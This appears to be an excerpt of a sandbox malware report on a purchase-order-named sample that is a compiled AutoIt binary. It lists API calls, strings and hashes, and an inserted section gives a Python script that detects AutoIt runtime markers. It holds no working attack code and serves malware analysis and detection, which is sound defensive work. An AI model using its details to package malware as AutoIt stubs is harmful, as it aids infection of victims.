                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 464785882-4108050209
                                                                    • Opcode ID: e055b37629bc293a34b93174c8f56782995c84384c3b1ee47f2f9060bd9999ba
                                                                    • Instruction ID: ba56c072d9f1c5abae851a6a5c22c52b16ef7a5ec6104ebceb9d4a2187650f6d
                                                                    • Opcode Fuzzy Hash: e055b37629bc293a34b93174c8f56782995c84384c3b1ee47f2f9060bd9999ba
                                                                    • Instruction Fuzzy Hash: 9E129D34601201EFDB50CF24C8D8BA9BBE5BF05310F548569F9A5CB262CB31ED92EB91
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 00C874DE
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C8759D
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C875DB
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C875ED
                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C87633
                                                                    • GetClientRect.USER32(00000000,?), ref: 00C8763F
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C87683
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C87692
                                                                    • GetStockObject.GDI32(00000011), ref: 00C876A2
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00C876A6
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C876B6
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C876BF
                                                                    • DeleteDC.GDI32(00000000), ref: 00C876C8
                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C876F4
                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C8770B
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C87746
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C8775A
                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C8776B
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C8779B
                                                                    • GetStockObject.GDI32(00000011), ref: 00C877A6
                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C877B1
                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C877BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: cc31fbe6d15ae3bb33d207345f755031fe7ddf7217cc2b61a15cbedc439a7139
                                                                    • Instruction ID: d2e4a66305a7bfb243408a74cb854ce4d3647cf1da8c44eb06561babc9905596
                                                                    • Opcode Fuzzy Hash: cc31fbe6d15ae3bb33d207345f755031fe7ddf7217cc2b61a15cbedc439a7139
                                                                    • Instruction Fuzzy Hash: F3A181B1A40605BFEB14DBA4DC4AFAE7BB9EB05714F108219FA14E72E0D770AD01DB64
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00C7AD1E
                                                                    • GetDriveTypeW.KERNEL32(?,00C9FAC0,?,\\.\,00C9F910), ref: 00C7ADFB
                                                                    • SetErrorMode.KERNEL32(00000000,00C9FAC0,?,\\.\,00C9F910), ref: 00C7AF59
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: 470c7c9a5887d9aca352bccb1087d9fcbef975146bd6139b97ef2b0e61955841
                                                                    • Instruction ID: eee0c6c0c6062f468c346a0c9a5d8e3c704827bbb85902e51f6a2bb66c45e756
                                                                    • Opcode Fuzzy Hash: 470c7c9a5887d9aca352bccb1087d9fcbef975146bd6139b97ef2b0e61955841
                                                                    • Instruction Fuzzy Hash: 355184B1649205EB8B10DB91C952EBE7361EB89700B20C06BF41BA72D1DB319E46FB53
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-86951937
                                                                    • Opcode ID: af6930fd701dcf8476d053da859591df7336a82e7a7418ba092ff5cb33018570
                                                                    • Instruction ID: 3f1a1d970af15ee194d5bcc649d7ba462d98bef3b05f1fe09190c3d2b0a1d862
                                                                    • Opcode Fuzzy Hash: af6930fd701dcf8476d053da859591df7336a82e7a7418ba092ff5cb33018570
                                                                    • Instruction Fuzzy Hash: 348104B1640215ABCF21BF65EC46FFF7768BF07700F044024F945AA192EB61DA86F2A1
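The string IDs recorded for the window-setup functions above (`AutoIt v3`, `static`, `msctls_progress32`) and for the directive parser just listed (`#requireadmin`, `#pragma compile`, `#OnAutoItStartRegister`, ...) are the AutoIt v3 interpreter's own literals, which is what backs the report's "Binary is likely a compiled AutoIt script file" signature. The following Python is an added triage helper, not code from the Joe Sandbox report or from AutoIt: it scans a file image for those markers so an analyst can confirm the AutoIt stub before extracting the embedded script. The marker list is copied from the report's String ID lines; the choice to check both UTF-16LE and ASCII encodings is an assumption (the listed APIs are the wide-char W variants, so the literals are most likely UTF-16LE), and the two sample buffers are constructed here for the demonstration.

```python
"""
Triage helper: flag a file image as a probable compiled AutoIt v3 binary by
the interpreter strings it carries. Added example, not part of the report.
"""
import re
import sys

# Markers copied from the report's "String ID" lines for the AutoIt runtime
# (window class/title strings and script pre-processor directives).
AUTOIT_MARKERS = (
    "AutoIt v3",
    "#OnAutoItStartRegister",
    "#requireadmin",
    "#notrayicon",
    "#pragma compile",
    "#include-once",
)


def _encodings(marker: str):
    # Assumption: the runtime uses the W (wide-char) Win32 APIs, so literals are
    # normally UTF-16LE; ASCII is checked too so an ANSI copy is not missed.
    return (marker.encode("ascii"), marker.encode("utf-16-le"))


def find_autoit_markers(data: bytes) -> dict:
    """Return {marker: [offsets]} for every marker present in either encoding."""
    hits = {}
    for marker in AUTOIT_MARKERS:
        offsets = []
        for needle in _encodings(marker):
            offsets += [m.start() for m in re.finditer(re.escape(needle), data)]
        if offsets:
            hits[marker] = sorted(offsets)
    return hits


def is_probably_compiled_autoit(data: bytes, min_markers: int = 2) -> bool:
    """Verdict: at least `min_markers` distinct runtime strings present."""
    return len(find_autoit_markers(data)) >= min_markers


# Constructed sample inputs (not real files): a stub-like buffer carrying
# three markers (two UTF-16LE, one ASCII) and a buffer carrying none.
SAMPLE_AUTOIT = (
    b"MZ" + b"\x00" * 62
    + "AutoIt v3".encode("utf-16-le")          # offset 64
    + b"\x00" * 8
    + "#requireadmin".encode("utf-16-le")      # offset 90
    + b"\x00" * 8
    + b"static\x00"
    + "#pragma compile".encode("ascii")        # offset 131
)
SAMPLE_OTHER = b"MZ" + b"\x00" * 62 + "Hello, world".encode("utf-16-le")


if __name__ == "__main__":
    # Usage: python autoit_triage.py <file>   (defaults to the constructed sample)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_AUTOIT
    for marker, offsets in find_autoit_markers(blob).items():
        print(f"{marker!r:28} at {[hex(o) for o in offsets]}")
    print("compiled AutoIt:", is_probably_compiled_autoit(blob))
```

A positive verdict only says that the executable is the AutoIt interpreter stub; the functions on this page (splash image loading, progress dialog, DriveGetType string table, directive parsing) are that interpreter's own code, and the behaviour the report attributes to FormBook lives in the compiled script the stub carries and unpacks, which still has to be extracted and decompiled separately.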
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 00C9A903
                                                                    • SetTextColor.GDI32(?,?), ref: 00C9A907
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C9A91D
                                                                    • GetSysColor.USER32(0000000F), ref: 00C9A928
                                                                    • CreateSolidBrush.GDI32(?), ref: 00C9A92D
                                                                    • GetSysColor.USER32(00000011), ref: 00C9A945
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C9A953
                                                                    • SelectObject.GDI32(?,00000000), ref: 00C9A964
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00C9A96D
                                                                    • SelectObject.GDI32(?,?), ref: 00C9A97A
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A999
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C9A9B0
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00C9A9C5
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C9A9ED
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C9AA14
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00C9AA32
                                                                    • DrawFocusRect.USER32(?,?), ref: 00C9AA3D
                                                                    • GetSysColor.USER32(00000011), ref: 00C9AA4B
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00C9AA53
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C9AA67
                                                                    • SelectObject.GDI32(?,00C9A5FA), ref: 00C9AA7E
                                                                    • DeleteObject.GDI32(?), ref: 00C9AA89
                                                                    • SelectObject.GDI32(?,?), ref: 00C9AA8F
                                                                    • DeleteObject.GDI32(?), ref: 00C9AA94
                                                                    • SetTextColor.GDI32(?,?), ref: 00C9AA9A
                                                                    • SetBkColor.GDI32(?,?), ref: 00C9AAA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1996641542-0
                                                                    • Opcode ID: b517e3f2ffb43438789f8a2f959645e1579e43bccc75f16f87622a21064ee489
                                                                    • Instruction ID: 9512f3d028b2c64f3f056bcf0109f8f68330d23922bba52c1ccdd871f091edcd
                                                                    • Opcode Fuzzy Hash: b517e3f2ffb43438789f8a2f959645e1579e43bccc75f16f87622a21064ee489
                                                                    • Instruction Fuzzy Hash: 1D510C71900218EFDF119FA4DC4CBAE7BB9FB48320F21452AF911EB2A1D6759A41DB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C98AC1
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C98AD2
                                                                    • CharNextW.USER32(0000014E), ref: 00C98B01
                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C98B42
                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C98B58
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C98B69
                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C98B86
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00C98BD8
                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C98BEE
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C98C1F
                                                                    • _memset.LIBCMT ref: 00C98C44
                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C98C8D
                                                                    • _memset.LIBCMT ref: 00C98CEC
                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C98D16
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C98D6E
                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00C98E1B
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00C98E3D
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C98E87
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C98EB4
                                                                    • DrawMenuBar.USER32(?), ref: 00C98EC3
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00C98EEB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                    • String ID: 0
                                                                    • API String ID: 1073566785-4108050209
                                                                    • Opcode ID: 0e5af4c1ae6436225d3f386ea8a55dfe12029478bb877edf6755ca8c6cd6cc61
                                                                    • Instruction ID: 2023fc6d1e04e67e035bd1f328dbe128e76e5689a4b99182776a704d865916fc
                                                                    • Opcode Fuzzy Hash: 0e5af4c1ae6436225d3f386ea8a55dfe12029478bb877edf6755ca8c6cd6cc61
                                                                    • Instruction Fuzzy Hash: 22E15071900218ABDF209F61CC88FEE7B79EF06710F10815AF925AB290DF749A85DF60
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00C949CA
                                                                    • GetDesktopWindow.USER32 ref: 00C949DF
                                                                    • GetWindowRect.USER32(00000000), ref: 00C949E6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00C94A48
                                                                    • DestroyWindow.USER32(?), ref: 00C94A74
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C94A9D
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C94ABB
                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C94AE1
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00C94AF6
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C94B09
                                                                    • IsWindowVisible.USER32(?), ref: 00C94B29
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C94B44
                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C94B58
                                                                    • GetWindowRect.USER32(?,?), ref: 00C94B70
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00C94B96
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00C94BB0
                                                                    • CopyRect.USER32(?,?), ref: 00C94BC7
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00C94C32
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: 24bab89de8df9f3b6c486a83c30d093151606a5970b3e1cf7932310c7e3b7304
                                                                    • Instruction ID: 3ba6362a9ebd1603487721974658f93edaf4902a9c12d0b8bbdb96caa7e32bfa
                                                                    • Opcode Fuzzy Hash: 24bab89de8df9f3b6c486a83c30d093151606a5970b3e1cf7932310c7e3b7304
                                                                    • Instruction Fuzzy Hash: 98B18B71608340AFDB08DF65C848F6ABBE4FF89310F00891DF5999B2A1DB70E946DB95
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C128BC
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00C128C4
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C128EF
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00C128F7
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00C1291C
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C12939
                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C12949
                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C1297C
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C12990
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00C129AE
                                                                    • GetStockObject.GDI32(00000011), ref: 00C129CA
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C129D5
                                                                      • Part of subcall function 00C12344: GetCursorPos.USER32(?), ref: 00C12357
                                                                      • Part of subcall function 00C12344: ScreenToClient.USER32(00CD57B0,?), ref: 00C12374
                                                                      • Part of subcall function 00C12344: GetAsyncKeyState.USER32(00000001), ref: 00C12399
                                                                      • Part of subcall function 00C12344: GetAsyncKeyState.USER32(00000002), ref: 00C123A7
                                                                    • SetTimer.USER32(00000000,00000000,00000028,00C11256), ref: 00C129FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: 1c12b34e1f6b95c4e479453210e16a22cc29a7102dbc9331e06d42c292790ee7
                                                                    • Instruction ID: 36a95a6e0e416e18910d0fbcdf1fef13e74c282a2fcec3781027030047c3b06e
                                                                    • Opcode Fuzzy Hash: 1c12b34e1f6b95c4e479453210e16a22cc29a7102dbc9331e06d42c292790ee7
                                                                    • Instruction Fuzzy Hash: B5B15D75A0120ADFDB14DFA8DC89BED7BB4FB08311F10412AFA15E62E0DB749951EB50
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00C93E6F
                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C93F2F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                    • API String ID: 3974292440-719923060
                                                                    • Opcode ID: 92f08d53487651e838ead14eaf0a3d77c53aca0622311b63363b069ac1bcba15
                                                                    • Instruction ID: 724daed08608874cdea620bcff1b758ad5c0e8269cecbe590644d4039e485892
                                                                    • Opcode Fuzzy Hash: 92f08d53487651e838ead14eaf0a3d77c53aca0622311b63363b069ac1bcba15
                                                                    • Instruction Fuzzy Hash: B5A17E712143419BCF14EF11C86AE6AB3A5EF85314F10896CF8669B2D2DB31EE46EB41
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00C6A47A
                                                                    • __swprintf.LIBCMT ref: 00C6A51B
                                                                    • _wcscmp.LIBCMT ref: 00C6A52E
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C6A583
                                                                    • _wcscmp.LIBCMT ref: 00C6A5BF
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00C6A5F6
                                                                    • GetDlgCtrlID.USER32(?), ref: 00C6A648
                                                                    • GetWindowRect.USER32(?,?), ref: 00C6A67E
                                                                    • GetParent.USER32(?), ref: 00C6A69C
                                                                    • ScreenToClient.USER32(00000000), ref: 00C6A6A3
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00C6A71D
                                                                    • _wcscmp.LIBCMT ref: 00C6A731
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00C6A757
                                                                    • _wcscmp.LIBCMT ref: 00C6A76B
                                                                      • Part of subcall function 00C3362C: _iswctype.LIBCMT ref: 00C33634
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                    • String ID: %s%u
                                                                    • API String ID: 3744389584-679674701
                                                                    • Opcode ID: 34a33f8f8b345b64f37fd75b8abdd994e37f6eafbf020182e1cb6ca616bb1ff8
                                                                    • Instruction ID: a7a594205270e2ef5bcf5874b72d1b072de87f47398d750be8c20f15755ca014
                                                                    • Opcode Fuzzy Hash: 34a33f8f8b345b64f37fd75b8abdd994e37f6eafbf020182e1cb6ca616bb1ff8
                                                                    • Instruction Fuzzy Hash: C9A1A271204706AFD724DF64C8C4BAAB7E8FF44355F108529F9A9E2150DB30EA56CF92
                                                                    APIs
                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00C6AF18
                                                                    • _wcscmp.LIBCMT ref: 00C6AF29
                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C6AF51
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00C6AF6E
                                                                    • _wcscmp.LIBCMT ref: 00C6AF8C
                                                                    • _wcsstr.LIBCMT ref: 00C6AF9D
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00C6AFD5
                                                                    • _wcscmp.LIBCMT ref: 00C6AFE5
                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C6B00C
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00C6B055
                                                                    • _wcscmp.LIBCMT ref: 00C6B065
                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00C6B08D
                                                                    • GetWindowRect.USER32(00000004,?), ref: 00C6B0F6
                                                                    Strings
                                                                    Memory Dump Source
